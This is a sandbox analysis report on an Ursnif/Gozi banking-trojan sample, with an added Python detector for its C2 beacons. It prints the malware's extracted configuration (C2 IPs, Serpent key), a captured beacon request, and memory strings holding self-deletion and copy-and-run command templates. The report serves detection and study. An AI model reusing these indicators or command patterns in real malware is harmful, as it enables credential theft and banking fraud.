Windows Analysis Report
server.exe

Overview

General Information

Sample Name: server.exe
Analysis ID: 826138
MD5: 43cfce2e126b1bf5230e51edd205f6bd
SHA1: 9ca60bfc3cb13b40f02810869ce9531cb0ab76d4
SHA256: 47d288233a39a68396567e35a77a500e296218df3a4bc9daca797e75b4b03d4b
Tags: agenziaentrate, exe, gozi, isfb, ITA, mef, mise, ursnif

Detection

Ursnif, CryptOne
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • server.exe (PID: 5596, cmdline: C:\Users\user\Desktop\server.exe, MD5: 43CFCE2E126B1BF5230E51EDD205F6BD)
  • cleanup
Name: Gozi, Ursnif
Description: 2000 Ursnif aka Snifula; 2006 Gozi v1.0, Gozi CRM, CRM, Papras; 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest. In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
Malware Configuration (Ursnif):
{
  "RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=",
  "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"],
  "botnet": "7713",
  "server": "50",
  "serpent_key": "rqDYWFa4uPXuBFMj",
  "sleep_time": "1",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
Source | Rule | Description | Author
00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security
00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  Matched strings:
  • 0x1228:$a1: /C ping localhost -n %u && del "%s"
  • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xa9c:$a5: filename="%.4u.%lu"
  • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe6d:$a9: &whoami=%s
  • 0xe56:$a10: %u.%u_%u_%u_x%u
  • 0xd63:$a11: size=%u&hash=0x%08x
  • 0xb1d:$a12: &uptime=%u
  • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
  • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_261f5ac5 | unknown | unknown
  Matched strings:
  • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(5 further Yara entries are not shown in this excerpt)
        No Sigma rule has matched
Snort IDS alert
Timestamp: 03/14/23-12:27:29.882824
Source: 192.168.2.4:49685
Destination: 62.173.142.51:80
Protocol: TCP
SID: 2033203
Classtype: A Network Trojan was detected


        AV Detection

Source: server.exe  ReversingLabs: Detection: 12%
Source: 0.2.server.exe.2190174.1.unpack  Avira: Label: TR/Kazy.4159236
Source: 0.2.server.exe.400000.0.unpack  Avira: Label: TR/Crypt.XPACK.Gen7
Source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp  Malware Configuration Extractor: Ursnif (configuration listed above)
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

        Compliance

Source: C:\Users\user\Desktop\server.exe  Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: server.exe  Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

        Networking

Source: Traffic  Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49685 -> 62.173.142.51:80
Source: global traffic  HTTP traffic detected:
  GET /drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 62.173.142.51
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: Joe Sandbox View  ASN Name: SPACENET-ASInternetServiceProviderRU
Source: unknown  DNS traffic detected: query: checklist.skype.com replycode: Name error (3)
Source: unknown  TCP traffic detected without corresponding DNS query: 62.173.142.51 (5 connections)
Source: unknown  TCP traffic detected without corresponding DNS query: 94.103.183.153 (3 connections)
Source: server.exe, 00000000.00000002.569377745.00000000027FC000.00000004.00000010.00020000.00000000.sdmp  String found in binary or memory: http://94.103
Source: unknown  DNS traffic detected: queries for: checklist.skype.com
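The two network heuristics behind the evidence above, written out as an added example (not part of the Joe Sandbox report and not Ursnif/ISFB code). The ISFB beacon hides a Serpent-CBC ciphertext in the request path: the ciphertext is base64-encoded, "+" and "/" are escaped as "_2B" and "_2F" (the "_2B" the Snort rule name refers to), and the text is chopped into random-length path segments, so the segments must be rejoined before unescaping. The directory prefix ("drew"), the fake file name and extension ("u.jlk"), and the two escapes are assumptions generalised from the single request captured here; a real decoder would then Serpent-decrypt with the extracted serpent_key, which is left out. The User-Agent check relies on the template string seen in the Yara match: "MSIE 8.0" on "Windows NT 10.0" is a combination no real browser sends. The DNS/TCP correlation reproduces the sandbox's "TCP traffic without corresponding DNS query" heuristic over event records constructed from the lines above.

```python
import base64
import re
from urllib.parse import urlsplit

# Escapes ISFB applies to the base64 text before chopping it into path segments.
# Only the two escapes visible in the captured request are handled.
ISFB_ESCAPES = (("_2B", "+"), ("_2F", "/"))
SERPENT_BLOCK = 16   # Serpent-CBC ciphertext, so the decoded blob is block aligned
ISFB_UA = re.compile(
    r"^Mozilla/4\.0 \(compatible; MSIE 8\.0; Windows NT (\d+)\.(\d+)[^)]*\)$")


def isfb_payload(url_or_path):
    """Rebuild the ciphertext hidden in an ISFB-style URI path.

    Assumed layout (generalised from the one request in the report): a fixed
    first segment ("drew"), random-length base64 chunks, and a last segment
    carrying a fake file extension ("u.jlk").  Returns the decoded bytes, or
    None when the path does not fit the scheme.
    """
    segs = [s for s in urlsplit(url_or_path).path.split("/") if s]
    if len(segs) < 3:
        return None
    segs = segs[1:]                          # drop the configured prefix
    name, dot, _ext = segs[-1].partition(".")
    if not dot:
        return None
    segs[-1] = name
    # Join first, then unescape: an escape can straddle a segment boundary
    # ("...85_" + "/" + "2FJqj..." in the captured request).
    blob = "".join(segs)
    for esc, ch in ISFB_ESCAPES:
        blob = blob.replace(esc, ch)
    if not re.fullmatch(r"[A-Za-z0-9+/]+", blob):
        return None
    blob += "=" * (-len(blob) % 4)           # padding is stripped on the wire
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:                       # binascii.Error subclasses ValueError
        return None
    return raw if len(raw) % SERPENT_BLOCK == 0 else None


def impossible_ie_ua(user_agent):
    """True when the ISFB UA template claims IE 8 on an NT kernel newer than
    6.1: IE 8 was never shipped for Windows 8 or 10."""
    m = ISFB_UA.match(user_agent)
    if not m:
        return False
    return (int(m.group(1)), int(m.group(2))) > (6, 1)


def score_request(method, url_or_path, headers):
    """Return the ISFB beacon indicators present in one HTTP request."""
    hits = []
    payload = isfb_payload(url_or_path)
    if method == "GET" and payload is not None:
        hits.append(f"isfb_uri:{len(payload)}_bytes")
    if impossible_ie_ua(headers.get("User-Agent", "")):
        hits.append("isfb_user_agent")
    return hits


def direct_ip_connections(events):
    """Destinations contacted over TCP that no successful DNS answer produced:
    the sandbox's "TCP traffic without corresponding DNS query" heuristic."""
    resolved, flagged = set(), []
    for ev in events:
        if ev["type"] == "dns" and ev["rcode"] == "NOERROR":
            resolved.update(ev["answers"])
        elif ev["type"] == "tcp" and ev["dst"] not in resolved and ev["dst"] not in flagged:
            flagged.append(ev["dst"])
    return flagged


# Constructed sample data, taken from the Networking section of the report.
REPORT_PATH = ("/drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/"
               "7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/"
               "zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/"
               "_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/"
               "ayBpSg1Jbp3hq/vUJdeVU7/u.jlk")
REPORT_HEADERS = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)",
                  "Host": "62.173.142.51", "Connection": "Keep-Alive",
                  "Cache-Control": "no-cache"}
REPORT_EVENTS = (
    [{"type": "dns", "name": "checklist.skype.com", "rcode": "NXDOMAIN", "answers": []}]
    + [{"type": "tcp", "dst": "62.173.142.51", "dport": 80}] * 5
    + [{"type": "tcp", "dst": "94.103.183.153", "dport": 80}] * 3
)

if __name__ == "__main__":
    print(score_request("GET", REPORT_PATH, REPORT_HEADERS))
    print(direct_ip_connections(REPORT_EVENTS))
```

On the captured request the rejoined blob is 256 base64 characters, i.e. 192 bytes, which is 12 Serpent blocks; a path whose rebuilt blob is not block aligned, or that contains characters outside the base64 alphabet, is rejected rather than guessed at. The correlation routine flags both C2 addresses because the only lookup the sample made (checklist.skype.com, listed first in the extracted c2_domain array) returned NXDOMAIN, so neither IP was ever resolved.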

        Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match  File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

        E-Banking Fraud

Source: Yara match  File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

        System Summary

Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR  Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR  Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\Desktop\server.exe  WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\server.exe  WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe  WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe  WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\server.exe  WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe  WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe  WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Note: StdRegProv methods execute inside the WMI provider host, so these registry writes are carried out by WmiPrvSE.exe rather than by server.exe; process-attributed registry telemetry (Sysmon event ID 13, for example) shows WmiPrvSE.exe as the writer, and because WmiPrvSE.exe is excluded from this analysis (see Cookbook Comments) the keys and values actually written are not recorded in this report.
Source: server.exe  Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR  Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR  Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD16DF
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD1D8A
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD832C
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_00401459 NtMapViewOfSection
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD8551 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02190F65 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
Source: server.exe  ReversingLabs: Detection: 12%
Source: C:\Users\user\Desktop\server.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\server.exe  Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\server.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: classification engine  Classification label: mal100.troj.evad.winEXE@1/0@1/2
Source: C:\Users\user\Desktop\server.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\server.exe  File read: C:\Windows\System32\drivers\etc\hosts

        Data Obfuscation

Source: C:\Users\user\Desktop\server.exe  Unpacked PE file: 0.2.server.exe.400000.0.unpack  CODE:ER; DATA:W; BSS:W; .idata:W; .tls:W; .rdata:R; .reloc:R; .rsrc:R  vs.  .text:ER; .rdata:R; .data:W; .bss:W; .rsrc:R; .reloc:R
Source: C:\Users\user\Desktop\server.exe  Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD7F30 push ecx; ret 0_2_02BD7F39
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD831B push ecx; ret 0_2_02BD832B
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_0219A3E0 push edx; ret 0_2_0219A558
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_0219A290 push edx; ret 0_2_0219A29B
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_00401000 LoadLibraryA,GetProcAddress

        Hooking and other Techniques for Hiding and Protection

Source: initial sample  Icon embedded in binary file: icon matches a legit application icon: icon.png
Source: Yara match  File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR
Source: C:\Users\user\Desktop\server.exe  Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\server.exe  Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

Source: C:\Users\user\Desktop\server.exe  Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\server.exe  Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\server.exe  API call chain: ExitProcess graph end node

        Anti Debugging

Source: C:\Users\user\Desktop\server.exe  Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_00401000 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\server.exe  Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02190F65 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD3BD3 cpuid
Source: C:\Users\user\Desktop\server.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
Source: C:\Users\user\Desktop\server.exe  Code function: 0_2_02BD3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

        Stealing of Sensitive Information

Source: Yara match  File source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR

        Remote Access Functionality

Source: Yara match  File source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: server.exe PID: 5596, type: MEMORYSTR
MITRE ATT&CK Matrix (tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact; only techniques with matched signatures are listed, with the match count as shown in the matrix)

Tactic | Techniques with matched signatures (count)
Initial Access | none
Execution | Windows Management Instrumentation (2); Native API (12)
Persistence | none
Privilege Escalation | none
Defense Evasion | Masquerading (1); Virtualization/Sandbox Evasion (1); Disable or Modify Tools (1); Obfuscated Files or Information (1); Software Packing (21)
Credential Access | none
Discovery | System Time Discovery (1); Security Software Discovery (1); Virtualization/Sandbox Evasion (1); Process Discovery (1); Account Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1); System Information Discovery (124)
Lateral Movement | none
Collection | Archive Collected Data (11)
Exfiltration | none
Command and Control | Encrypted Channel (2); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Network Effects | none
Remote Service Effects | none
Impact | Data Encrypted for Impact (1)

Source | Detection | Scanner | Label
server.exe | 13% | ReversingLabs |
No Antivirus matches

Source | Detection | Scanner | Label
0.2.server.exe.2bd0000.3.unpack | 100% | Avira | HEUR/AGEN.1245293
0.2.server.exe.2190174.1.unpack | 100% | Avira | TR/Kazy.4159236
0.2.server.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
No Antivirus matches

Source | Detection | Scanner | Label
http://62.173.142.51/drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk | 0% | Avira URL Cloud | safe
http://94.103 | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
checklist.skype.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://62.173.142.51/drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
